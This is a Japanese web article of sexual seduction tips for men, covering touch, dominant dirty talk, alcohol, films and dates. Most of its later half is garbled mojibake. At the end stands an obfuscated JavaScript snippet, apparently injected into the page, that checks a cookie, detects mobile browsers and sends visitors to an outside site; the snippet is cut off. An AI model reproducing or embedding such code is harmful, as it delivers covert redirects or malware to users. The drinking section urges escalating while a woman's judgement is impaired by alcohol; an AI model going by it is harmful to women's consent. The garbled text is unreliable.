身構えてしまったら、その後なかなか本心を出しにくくなり、欲望が表に出せないままになります。

この辺りの駆け引きがエロさを存分に引き出すポイントとなります。

話術を身につければ、話を誘導していくだけで女性がその気になると思います。

ソフトなボディタッチ

合コンや、盛り上がる場所などでは、よくボディタッチをしているシーン等で、嫌がる女性 を見かけたり、女性自身から男性に積極的に行っていたりするのを目にします。

男性からのボディタッチは、軽い男性が何気なくしているのかな?Hしたいと思ってしているのかな?など、女性は感じます。

ボディタッチに対して、恥ずかしい行為・何だかされたら嫌だとかよく聞いた事があるな、 とまだ不信感が残っているからです。

そこで大事になってくるのが、男性の「さりげなさ」です。

いきなり膝や太ももを撫でるのではなくて、相手女性のチャームポイントや、男性を意識して整えてきた髪などから優しくさわってみて下さい。

女性は、男性のさりげない行動で少しずつ自分がHな気分になってくるのを自覚し始めま す。

髪を撫でられたり、優しく抱き寄せられるように肩に触れられると、だんだんと自分からも 相手に触りたい!男性に触れたい!と思ってきます。

自然に男性にボディタッチをして、自らも触れて欲しいと、ねだってくるでしょう。

触られている時の女性の表情にも、女性の本音は隠れています。

Sな言葉を使う



女性は男性の甘い言葉に弱い、優しい話し方が好き、なんて言う事はよく耳にしますよね?

実は、それだけでは無いのです。

女性の心の中には、「言葉で攻められたい」もっと「言葉でイジメられたい」という願望が 女性には少なからずあるのです。

女性は、受け身である事が多いので、エロい気持ちになるには、男性がエロさを引き出す きっかけを作ってあげると良いでしょう。

Hの最中の場合は、「良い声で鳴くね!気持ち良い?」「素直になりなよ。ほら!自分から 腰動かしてるじゃん~?」など、女のM気質を揺さぶって下さい。

恥ずかしがっていても、内心はゾクゾクして、もっと言って欲しいと思っているので、男性 を求めたり、煽るように返事をさせるのも、M気質の女性には効果的かと思います。

「もっと脚開いて?」や「イキたい、って言いなよ!言わなきゃイかせてあげないよ~?」 などといたずらに、意地悪そうに言ってみてはどうでしょう。

お互い、気持ち良いHになり、盛り上がる事が出きると思います。

仕草を意識する

何気ない仕草にグッとくる!可愛らしい仕草に思わずムラムラする!という心理がはたらく事、男性は多いのではないでしょうか?

女性も、実は男性の仕草にドキドキしたり、こんな仕草されたらHな事考えたりしちゃう! という心理をもつ傾向があるようです。

袖をまくる仕草が男らしい」と感じる女性は、その仕草にドキドキしています。

それと同時に腕の筋肉にも視線が向きます。

何気なく袖まくりをしている時に、じっとその仕草を見つめていたり、チラチラみている、 と感じたら、「何?俺の腕見ちゃって~」「触りたい?」などと仕草だけでなく、相手女性に触れさせようとしてみましょう。

片手でネクタイを緩める仕草が好き」なんて女性に対しては、「ねぇ、ネクタイ苦しいか ら少し緩めてよ」などと仕草をしながら、女性にさせる事で、お互いの距離もグッと縮まる 事でしょう。

仕草を見せられ後なので、女性は、かなりエロい気分になっているはずです。

お酒がはいった時



無理やり飲ませて酔わせてベッドへ誘うのは、何だか気が引けてしまうな、酔ってる女性に 付け入るのも、と考えたりしますよね。

まず、そんな時は、相手女性の好みのお酒やカクテルなどを用意しましょう!

一緒に労う感 じで、リラックスできる空間を作り、気持ち良くお酒を楽しみます。

個人差もありますが、お酒が入ると女性は大胆になりやすいです。

気持ち良くなりますし、ほろ酔い気分なので、男性を意識し始めて甘え始める女性も少なくはないと思います。

これだけでも男性は悦びを感じるかも知れませんが、もっとイヤらしくエロくなって欲しい ですね。

そんな時は、相手のエロさをほめてみて下さい。

そんなに短いスカート履いて、エロい格好だね」や「(お酒飲んでる)その口、されるとタ マらないや」など、様々な視点から女性をみつめて下さい。

あまり、しつこく言うと、シラフに戻ってしまうので、程よいタイミングで言うと良いかも 知れません。

「エロい」、「やらしい」、「たまらない」と言われたら、女性も恥ずかしかったり、照れ たりしながらも、お酒で思考回路が上手く回らないのか、相手女性もだんだんと自分から男 性にもたれたり、脚を絡めたり、といった行動をしてくるようになります。

恋愛映画を見る

一緒に映画を見に行くとしたら、ラブストーリーものを観ることをお勧めします。

相手女性が見たいのは好きな俳優が主演していて、少しHなシーンやエロいシチュエーションなどがある映画が主だと思います。

そして女性は「私も一度は…」などと、感じてしまうものです。

好きな俳優にあんな事されたら」とキュンとしている相手女性を見ると、男性としてはおもしろくないですよね。

そんな時は、映画の余韻が冷めないうちに、そのまま女性をもっとHな気持ちにするのです。

例えば、見終わってから「ねぇ、さっきのHなシーン良かったよね?お前、何かキュンキュ ンしてたじゃん?」「同じコトされたくなっちゃった?」と肩や腰に腕を回して強気にオトコ を出して言ってみてはどうでしょう。

映画の余韻と、実際の心を見透かされた・もう隠せないという感情で、身も心もすべてゆだねていくでしょう。

いつもと違うデート



季節折々で行き先は違うかも知れませんが、いつも同じだと女性はもちろん男性もマンネリ になりがちですよね。

貴方とならどこに居ても楽しいわ」と言ってくれる女性が大半でしょうが、実はもっと刺 激を求めていたりするのではないでしょうか。

車内では、いつも同じような音楽を流しているならば、少し恋愛がテーマな曲を多く取り入れたりするのはどうでしょう。

女性は、音楽によって左右されるので、行き先までに少しエロくなっていて欲しかったり、 Hな気分になって欲しいなら、恋愛系や少しいやらしい歌詞が入った曲を流すのも良いで しょう。

ホテルや家にいつもと同じように行く前に、「ちょっと寄りたい所があるんだけど、付き合って」と相手女性をビックリさせるサプライズ的な行き先を用意します。

夜景がきれいな場所だったり、男性自身のお気に入りのバー等。

たっぷりムードを高めた後、二人の距離も縮まり、とびきり楽しく燃え上がる一日、濃厚な夜が始まることでしょう。

まとめ

いかがでしたか?すべてが当てはまる女性は居ないかも知れません。

女性の心の中には、男性が気づかないような観点が沢山ある事がお分かりいただけたかと思 います。

男性だけが悶々としているのではなく、女性も同じように感じたり、考えたりしているのだ と参考にしていただけたらと思います。

ai??i??a??a??SEXa?i??ai??i??a??a??a?i???i??i??ai??i??ai???a?i??a??a?i??ai???a?i??a??ai??i??a??a?i??i??a?i??a?i??a?i??a??

ci??i??a??ai??i??a?i??a?i??a?i??a?i??a?i??a?i??ai??i??ai???ai???ai??i??a??a??ai??i??a??ai???ai???ai??i??a?i??a?Ya?i??ai???ai??i???i???a?i???i??i??a??a?i??ai??i??a??a?sa?i??a?i??ai??i??

a?i??ai??i??ai???ai??i??a??a??ai??i??a??ai???ai???a?i??ai??i??a??a??a??ai???a??a?i??a??a?Ya??a?i??a?i??ai??i??ai???a??a??a?i??a??a??a?i??a??a?i??ci??Ya?i??a?i??a?i??a?i??a??a?i??e?i??a??a?i??a?i??ai?????i??ei???a?i??a??a?i??e?i??a?i??a?i??a?i??a?Ya?i??ai??i??a?i??a?i??a?i??ai??i??

ai??i??a??a??ai??i??a??ai???ai???a?i??ai??i??a??a??ai???ci??i???i??i??a???i??i??ai??i??a?i??a?i??ai??i??a??a??a?i??a??ai??i??a??a??ai???a?i??a??a??a?i??a?Yai??i??

a??a??ai???ai??i??a??a??ai??i??a??ai???ai???ai??i??a?i??ai??i??a??a??a?i??a?i??ei???a?i??a?i??a?i??a??a?i??a?i??a?i??i??

??i????i??a?i??a?i??ai??i??



ai??i??a??a?i??a??a??a?i??a??a??ai???a?i??a?i??ai??i??a??ai???ai???a??a?i??a?i??ai???ai???a???i???a?i??ai???a?i??a?i??a?i??a??a?i??a?Yai???a?i??ai??i??ai???a????i??a??a?i??a?i??ai??i??ai??i??a?i??a?i??a??a??a??ai???a?i??a??a?i??ai??Sa?i??ai??i????i????i??a?i??a?i??a?i??ai???ai??i??a??ai???ai???ai??i??a?i??a??a?i??ai??i??a?i??ai??i??

ci???c??a?i??ai???ai??i??ai???ai??i??ai???e?i????i??ai??i???S?a??ai???ai??i??a??a??a?i??a??ai??i??a?i??ai??i??ai???a?Se??ai??i??a?i??ai???ai??i??a?i??ai??i??a??a??a??ai??i???i???a??ai??i??a??a?i??ai???ci??i???i??i??a??a?i??ai??i??ci???e?i??a?i??a?i??a?i??a?Sa??a??a?i??ai??i??a?i??ai??i??

a?i??a??ai???a??ai???a?i??a??a?i??a?i??a??a?i??a?i??a??c??ai??i???i???a??a?i??a?Sa??a?i??a??a?i??ai????i???a??a?i??a?Sa?i??a??a?i??a??ai???a??a??a?i??ei???ai??i??a??ei??i??ai???ai???ai???ai???a?i??ei??i??ai???a?Ya??a??a?i??ai??i??a?i??a?i??a?i??a?i??a??a?i??a?i??a?i??ai???a?i??a??a?i??ai??Sa??a?S?i??i??ai???ai???ai??i??a?i??a?i??a?Sa?i??a?i??a??a?i??a?i??a?i??ai??i??

a??ai???a??ai???ai??i??a??a??a?sa?i??ai???a?i??ei??i??a??a?Ya?i??a??ai??i??a??a?i??a?i??a?i??ai???a?sa?i??ai???ai??i????i??a??a?i??ai??i??ai??i??a?i??a?i??a??ei???a?i??a?i??a?i??ai??i??a?i??ai???a??a?i??a?i??a?i??ai???a?sa?i??ai???a??ci??i???i??i??a??ei???a?i??a?i??a?i??ai??i??a?i??a??ai?????i??a??a?i??a?Sa?i??a?i??a?Sa??a??a?i??ai??i??a?i??ai??i??

e??a??a?sa??a?i??a?i?????ai??Se??a??a?i??ai???ai??i??a??ai??i???Si??a??a??ai??i??a?i??a?i??a??ai??i??a?i??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a??ai???a??a?i??a??a??a?i??ai??i??a?i??a?i??ai???a?i??a?i??ai???a??a?i????i????i??a?i??a?i??ai??i??a?i??a??a?i???i???ei???a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a??a?i??e??ai??i??a?i??ai???ai??i??

ai??i??a??a??a??ai???a?i??a?i???i??i??a??ai???ai??i??a?i??a?i??a?i??a??ci??Sa?i??a?i??a?i??a?i??ai??i??a?i??a?i??ai???a??a?i??ci??Sa?i??ai??i??a?i??a??a?i??a?i??ai??i??ci??i???i??i??a?i??a??ci??i??ai??i??

ci???a?i??ai???ai??i??a??a?i??a??a??a?i??a??ai???a??ai???a?i??ei???ai??i??ci??i???i??i??a?i??e??a??a?i??a??a?Ya?i??ai??i??a?i??ai???a??a?i??ai??i??a?i??ai???ci??i???i??i??a?i??e??ai??i??ei??i??ai??i??ai???ai??i??a?i??a??a??ai???a?i??a?i??a??e???i??i??a??ei???a?i??a?i??a?i??ai???a??a?se??a?i???i???ai???ai??i??a?i??ei???a??a?i??ai??Sa??a?i??ai??i??

a??a?i??a?Yai???a?i??ai???a?i??a??a?i??ai??i??ai??i??a?sa?i??ai?????i??a??a??a??a??a?i??e??a?i??a??ai??Sai???a?Se??ai??i??a?i??ai???a??a?i??a??a??a??e??a?i???i???ai???ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

a?i??ai??i??ai???a?Se??ai??i??a?i??ai???a?i??ai??i??a??a?i??a??a??a?i??a??ai???ai???ci??i???i??i??a?i??ai???a?i??a?i??c?i??ai??i??ei??i??a?i??a?i??ai???e??ai??i??ai???ai???ai???ai??i??ei??i??a?i??ai??i??ai???a??a?i??a?i??ai??i??a??a??a??a??a?i??ai??Sa??a?i??ai??i??

ai??i??a?i??ai???a??a??a??a?i??c?i??a?i??a??a??a?i??ai???a??ai???ai??i??ei??i??a??a?i??ai??i??e?Se?i??a?i??a?i??a?i??a?Yai??i??ai???ci??i???i??i??a??ai???a?i??ai???e??a?i??a??a??a?i??ai???ai???ai??i??ai???a??ai??i??a?i??ei??i??a??a?i??ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

a?i??a??a?Ya??ai???ai???a?i??e??ai??i??ei??i??a?i??ai???a?i??ai???a??a??ai??i??ei??i??a?Zai??i??a?i??a??a??ai??i??a?i??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??a??ai???ai??i??a??a??ai??i??ai??i???i??i??a??ai????i???a??a?sa??a??a??ai??Sa??a?i??a??ai??i??ei???ai???ai??i??a?i??a??ai??i??a?i??a??a?i??a?i??ai???e??a?i??a?sei??i??ai??i??a?i??a?i??a??a??a?i??ci??Sa?i??ai??i??a?i??a??a?i??a?i??a?i??a??ai????i???ai???a?i??a??a?Yai??i??a??a?i??ai???ai???a??a??a??a?i??ai??i??a?i??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??a??a?i?????ai???a?i??a??a?i??



a?i??a?i??ai??i??a?sa?i??ai???ai??i?????ai???a?Ya?i??a??a?i??a??a?i??ai??i??a??a?i??ai???ai???ai???a??ai???e?za??a?i??a??a?i??a??ai???a?i??a??a?i?????ai???ai???a?i??a??a?i??ai??i??a??ai???a???i??i??a??ci??i??a??ai??i??a?i??a?i??ai???a?i??a??a?i?????ai???a?i??a??a?i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

ai??i??a?i??a??a?i??a??ai???ai??????a?i???i??i??ei??i??ai??i??a?i??a?i??ai??i??a?i??a??a?i??a?i??ai??i??

ai??i??a??a?i??ai???ai???ai???a?i?????ai???a?i??ai??i??ai???a?i??ai???ai??i??a?i??a?i?????ai??i??a?i??a??a?i??ai???a?i??a?i??a?i??a??a?i??ai??i??a??ai???a?i??a??a?i??a??a?i??ai???ai???ai???ai??i???i??i??ai???ai??i??a?i??a??a??a?i??a?sai?????i??a??a??ai??i??ai???a?i??ai??i??ai??i??ai???a??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai???a??ei??i??ai??i??ai??i??a??a??ai??Sa???i??i??ai???a?i??a?i??a??ai???a??a??a?i??a??a?i????i??ai??i??a???i???a??a?Yai??i??ai???a?i??ai??i???i??i??ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a??ei??i??ai??i??ei??i??ai??i??ai???a?Ya?i??a??a??a??a?i??ai???a??a??a?i??ai??i??a?i??a?i??ai???a??e??a??ai??i?????ai??i??ei??i??a??ai???a?i??ai??????a?i??a?Sa?i??ai??i??a?Sa??a?i??a?i??ai??i????i??ai??i??a?i??ai??Sai???a??ei??i??ai??i??ei??i??ai??i??ai???a?i??a?i??a?i??ai???a??a?i??a?i??a?i??a?i??ai???a??a??ai??i??a?i??ai??i??ai???a?i??ai??i??ai???a?i??a?i??ai???a??a??a?i??a?Sa?i??a?Sa??a?i??a?i??ai??i????i??ai??i??a?i??ai??Sai???a??ei??i??a?i??ei??i??ai???ai??i??a??a?i??ai????i??i??esZai??i??e??ai??i??a?i???i??i??ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

ci????Z?ai???ai???ai???a??a?i??ai???ai??i??a??a?i??

ai???ai???ai???ai??i??ei??i??a??a?Yai??Sa??a?i??ai??i??a??a??ai?????i??a??a?i??ai??i??ci????Z?ei??i??a??a?i??a??a?i??a?i??a??a?i??ai??i??ai??i??

ai??i??a??a?i??ai???ai???ai???a??a??a?i??e?i??a?i??ai??i??ei??i??ai??i??ai???a?Ya?i??a??a??a??a?i??a?i??a?i??ai????i???a?i??ei??i??ai??i??ai???ai??i??a??ci??Sa?i??a?i??a??a?i??a?i??ai???a?i??ai???ai??Sa?i??a??ai??S?i????i??Ya??cSi???i??i??a??a?i??a?i??ai???a??a?sa??a?i??c?i??a?i??a?Sa?i??ai??i??ai???ai???a?i??a??ei??i??ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??a??a?i??ai??i??a?i??a?i??ai??i??a??a?i??a?i??a?i??ai???ci??Sa?i??ai??i??a?i??a??a?i??a??ai??i???i??i???i??i??ai??i??a?i??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

a?i??c?i??a?i??a?Sa?i??ai??i??ei??i??a??a?i??a?i??a?i??a?i??ai???ai??i??a?i??a?sa?i??a??a??a?i??ai???ai???ai???a?????ai???a?i??a??a?i??ai???a??a??a?i???i??i?????a??ai??i??ei?????sa?i??a?i??a??ai??i??a???i???a?i??a??a?i??a??ai????i???a??a?s?i??i??ei??i??ai??i??a?i??a?i??ai??i??a?i??a??a??ai??i??a?i??a??a?i??a?i??ai???ai???ai???ai???a??a??ei??i??ai??i??a???i????i??i??ai???ai??i??a??a?i??ai???ci??i???i??i??a?????ai???ai??i??ai??i??a??a????i???i???ai??i??a?i??a?i??ai???a??a??ai??i???i??i?????a??ai???a??a?i??a?i??ai??i??a?i??a??a?i??ai??i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai???cSi?????ai??i??ei??i??a?i??a?i??ai??i??ai???ai??Sa?i??a??ci????Z?ai???ai???ai???ai??i???i??i??ai???a??a?i??ai??i??a?i??ai??i??

?i??i??ai??i??ai???a?i??a?i??a?i??a?i??a?i??a?i??a??ai????i??i??a?za??a??a?i??a?sai?????i??a??a??ai???a??a??a??ai???ai??i???i??i??ai???ai???a??a?i??a?i??ai???ai???ai???ai??i??a??ai???a?i??e??a??a??a?i??ai??i??a?i??ai??i??

ai??i??a?i??a?Se??ai??i??a?i??ai???a??a?i??ai???a?i??a?i??a?i??a??a??a??a?i??c?i??ai??i??ai???a?i??a?i??a?i??a??a?i??ai???a??a??ai???a??ai???ai???ai???a?i??a?i??a?Sa?i??ai??i??ai???ai???ai???ai??i??ei??i??ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

??i??a??a????i??a?i??ai??i?????ai???ai??i??



ai??i??a?i??a?i?????ai???a?i??a??a?Yai??i??ai???a?i??ai???a?i??ai??????ai???a?i??a?i??a??ai???ai??i??a??a?i??ai???ai???ai???a?i??ci???a??ci??i??a?i??a?i??a?i??a?i??ai???a?sa?i??ai???a?i??ei???ai??i??a?sai???ai???ai???ai???a?i??ci???a?i??ci??i??ai??i??ai???ai???a?Yci???e?i??a??a??a?i??a?i??a??a??ai??sa?i??a?i??a?i??ai??i??

a??a?sai???ai???ai???ai???a??ai???ci??i??ai??i??ai???ai???ai??i??ai???a??a?i??a?i??a?i??a??a?i???i???ai???a??a?i??a??a??a?i??a?i??a??a?i??a?i??a?i??ai?????i??a??a????i??a?i??ai??i??ai???ai???a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

ai??i??a?i?????ai???a?i??a?i??ai??i??a?i??a??ai??i??c??e??a?i??ai???a??a?s??i??ai??i??i?i????i??ai???ai???ai????i???ai???a?i??a??a?Yai??i??i?i????i??ai???i?i????i??a??ai???ai???a?i??a?i??a??ai???ai??i??a?i??a?sa?i????i??ai??i??ai???a?i??ai???ai???a?i??ai?????i??a??a?i??ai??i??i?i??ai???a??a??a??ai??i???i??i??ai???a?i??ai?????i??a??a??ai??i??a?i??a?i??ai???a?i??a??a?i??a?i??ai??i??a?i??a??ai??i??ai???a?i??ai?????i??a?i??ei???a?i??a?i??ai??i??a??a?i??ai??i??ai???a?i??a?i??ai???ai???a?i??a???i??i??ai???a?i??a??a?i??a?i??a?i??ai??i??

a??a?i??a?i??ai???a?i??ai???a??a??ai??i???i???ai???a?i??a??a?i??ai????i??i?????a??a??ai???a??a??ai??Sa??a?i??a?i??ai?????i??a??a?sa?i??ai???a????i??a??a?i??c?i??a?i??a?i??a?i??ai???ci??i??a??ai??i??a??ai???a?i??a?i???i??Ya??a??a?i??a?i??a?i??ai???a??a??a?i??a??a??a?i??ai??i???i??i??a?????a?i??a??ai??i??a?i??a?i??ai??i??a?i??ai??i??

ai???a?i??a??a?i??a?sa?i??a?i??ai??i??

??i??ai??i??ai???a?i??ai???ai???a?i??a?i??ai???a??a??a??ai???ai??i??a??ai??i??ai???a??e?i??a??a?Yai??i??a?i??ai???a?i??ai???a?sa?i??ai???ai??i?????ai???a?i??ai??i??ai???a?i??a?i??a?i??a??ai?????i??a??a?i?????ai???a??ai???a?i??a??a?i??ai??Sa??ai???ei??i??a?i??a?i??ai???a?i??a?sai???a?i??ai??i??ai???a?i??a?i??a?i??ai??i?????ai???a?i??a??a?i??ai??i??a?i??ai??i??

a??a?i??e?i??ai??i??ci??Ya?i??ai??i??a??a?i??ai??Sa?i??ai??i??a?i??a?Yai??Sai???a?i??ai??i??a?i??a???i??i??ci??i??a?i??a??a??a?Yai??Sa?i??a?Yai??i??ai???a??a?i??e?i??a????i???i???a?i???i???a?i??ai???a?i??a??ai??Sai???ai??i??a??ai???ai???a?i??a??a?i??a?i??a??a?i??ai??i??a?za??a??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a?i??ai???a?i??ai???ai??Sa??a?i??e?i??a?i??ci????i??i??a?i??a?i??ai??i??ci??i???i??i??ai??i??ai???a??a??a??a?i??a?i??ai???a?i??a?i???i???a?i??a?i??a?i??ai??i??a?i??a?i??i?Y

ai??i??a??a?i??ci????i??i??ai??i??a?i??ai??i??ci??i???i??i??a?i??a??ai???a??a?i??e?i??ai??i????i??ei???a?i???i???a?i??ai???a?i??a?i??a?i??ai??i??a??a?i??a?i??a??ai???a??a?i??ai??i??a??e?i??a??a?i??ai??i??e?Ze?i??a?i??a??a??a?i??a?i??a?i??ai???a?i??a??a?i??ai??Sa??ai???a?i??ai??i??a?i??a?i??a?i?????ai???a?i??a??a?i??ai??i??a?i??ai??i??

ai??i??a??a??ai???a?i??a?i??ai???a?i???i???ai??i??cY?ai??i??a??a?i??a???i???a?i??a??a?i??a?i??a?i??ai???ci??i???i??i??a??a?i??a??a?i??ai??Sai???a?i???i???ai??i???i??i??a??ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

ai???a??a?i??e?i??a?i??ai???a?i??ai???a?i??ai??Sa?i??ai???a??a?i??a??i??i?i??a?i??a?i??ci???a?i??a??a?i??ai??Sa??a?i??a??ai?????i??a?i??a?i??a??a?i??a??a??a?Yai??i??ai???a?i??a??a?Yai??i??a??a??ai??i??ai??i??ai??i??a?i??a?i??a?i??a?i??ai???a?i??a??a??a?i??ai??i??ai???ai??i??a??ai???ai???ai??i??a?i??e?i??a?i??a?i??ai??i??ai???a??a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??a?i??a??a?i??ai??i??a?i??ai??i??

??i??a?i??a?????ai??i??a??a?i??



???ai???a?i??a?i??ai??i??ai?????i??a?i??a?????ai??i??a??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a?i??a?i??ai??i??a?sa?i??ai???ai??i??ai???ai???a?Ya?i??a??a?i??a??a?i??ai???ai???ai???a?i??a?sa?i??ai???a??ai???a??a?YcSi???i??i??a?i??ai???ai???ai???ai???a??a?i??a?i??a??ai???cSi???i??i??a??e?i??a??a?i??a?i??a?i??a?i??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai????i???a?i??ei???a??a?Yai??i??a??a?i??a?i??a?i??a??ai???a??ai??i??a??a??a??ai??i??a?i??a?i??a?i??a?i??a?i??ai???ai??i??a?i??a?i??a?i??ai??i??a??ai???ai???ai???a??ci??i??ai??i??a?i??ai??i??a?i??ai???a??a?i??a?i??a?i??ai???ai??i??a??a??ai??Sa??ai??i??a?i??a?i??ai???ai???ai???ai???ai??i??a?sa?i??ai???a?i???i???ai???a?i??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a??a??ai??Sa??a?sa?i??ai???ai??i??ai???a?i??ai???ai???a?i??ai???ci??i???i??i??a???i??i?????a??ai???a??a??ai??i??a?i??a?i??a??a??a??ai???a???i??i??ai??i???i??i?????a??ai???a??a?i??a?i??ai??i??a?i??a??a??ai??i??a?i??a?i??ai?????i??ci???a??ei??i??a?i??a?i??a??ai???ai??i??a??a??a?i??ai??i??a??ai???ai???a??ai??i??c??a??ci??i??csi??a?i??a??a??a??ai???ai???a??a??a?i????i??ei???a?i???i???a?i??ai???ai??i??a?i??a??a??a?i??ai??i??ai??i??a?i??a?i??a??ai???a??ci??i??csi??a?i??a?i??ai??i??

ai??i??a??a?i??ai???ai???ai???a?i????i??a?i??a?????ai???a?i??ai???ci??i???i??i??a???i??i?????a??ai???a??a??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a??ai???a???i??i??a???i??i?????a??a?i??a?i??a??a??ei???ai??i??a??a?i??a?i??a?i??ai???ai??i??a??a??ai??S?i??i??ei??i??ai??i??a?i??a?i??a?i??i?i??a??a?i???i??i??ei??i??ai??i?????a?i??ai??i??a?i??a??a?i??a?i??a?i??ai??i??

ci??i??a??a?i??a?i??e?i??a?i??a??ai??i??a??a?i??

ai??i??a??a??ai??i??a??ai???ai???a?i??a??a?i??a?i??e??ai???ai??i?????a??a?i??a?Sai??Sai???a?i??ai???a?i??ai???ai??i??a?i??a?i??a?i??a?i??ai??i??a???i???a?i??a??a?i??a??ai???a??ai???ai??i??a?i??a??a?i??ai??i??ai???a?i??a??a?i??ai??i??a?i??a??ei???a?i??a?i??a?i??a?i??ai??i??

??i??a??a?i??ai??i??a?i??ai??i??a?i??a??a?i??ai???i?i??i?i??a??a?i??ai??i??a???i??i??a?i??ei????i??i??a?i??a?sai???a??a?sa??ci??i???i??i??a??a?i??a?i??e?i??a?i??a??ai??i??a?sai???a??a??a?i??ai??i??a?i??a?i??ai??i??a??ai???ai???ai??i??a?i??a?i??a??a?i??a?i??a?i??ai??i??

ci??i???i??i??a??a?i??a?i??e?i??a?i??a??a??a?i??ai??i??ai???a??a??a??a?i??ai??i??a?i??a?i??a?i??a?i??a?i??ai???a?i??ai??i??a??a?i??a?i??a?i??ai???a??a?i??e?i??a??a??a?sa?i??a??a?Ya??a??a??a?i??a?i??a??ai??i?????a?i??a??a?i??a?i??ai????i???a?i??ai??i??a??ai???ai???a?i??ai??i??ai???a?i??ai??i??a?i??a??a?i??i?i??i?i??a??a?i??ai??i??ai???a?i??a??a?Ya??a??a??a?i???i??i??a??a??a??ai??i??ai??i??a??a?i??a?i??a??a??a?i??ai??i??a?i??ai??i??

ei???a?i??a??a?i??e?i??a??ai??????ai???a?i??ai???a??a??a??a?i??a??a?Ya?i???i??Yei???ai??i??a?i??a?i??a?i??ai??i??a?i??a?i??ai???ai????i???a??ci???a??ei??i??a?i??a??a?i???i??i?????a??ai???a??a?i??a?i??a?Ya?i??ai???a???i???a??a?i??a?i??ai??i??a?i??a?i??ai???a?i??a??a?Yai??i??a??a?i????Ya?i??a?i??a??a??ai??i??ai???a?i??a?i??ai???a??a??a?i???i??i??ai???ai??i??ai???ai??i??ai???a??a?i??a??a?i??ai??i??a?i??ai??i??

a??a?i??a?i??ai??i??a?i??a??a?i??ai???ai??Sai???a??a??a??ai??i??a??ai???ai???a??a??a??a?i??a??a??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a??ai???

ai??i??a??a??a?i??ai??i??a??ai???ai???ai???a?i??a??ai??Sa??a?i??e?i??a??ai???a??a??a?i??a??ci??Ya?i??a?Sa?i??a??a?i??ai??i??ai??i??a?i??a??ai??i??a?i??a??a??a??a?i??a?i??ai???ci??i???i??i??a?i??e?i??ai??i??a??ei???ai??i??a?i??a?i??ai??i??

ai??i??a?i??a??a?i??a??ai???ci??i???i??i??a??ei???a?i??a?i????i??ei???a?i??a?Yai???a?i??a??a??a??ai???a??a??a?i??a?i??a??ai??i???i???a?i??ai???a??a?i??a?i??a??a??a?i??a??a??a?i??ai???a?i??a??a?Ya??a?i??a??a?i??e?i??ai??i????i??ei???a?i???i???a?i??ai???a?i??a?i??ai??i??a?i??a??a??a?i??a?i??a?i??ai??i??

a??ai??i??a??a??ai??i???S?a?i??a??a?i??ai???c?i???i???ai??i??a?i??a?i??ai??i??a??ai???ai???a?i??ai??i??a?i??ai??i??i?i??a??a?i??ei???ai??Sa??a?i??ai??i??a?i??i??

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( 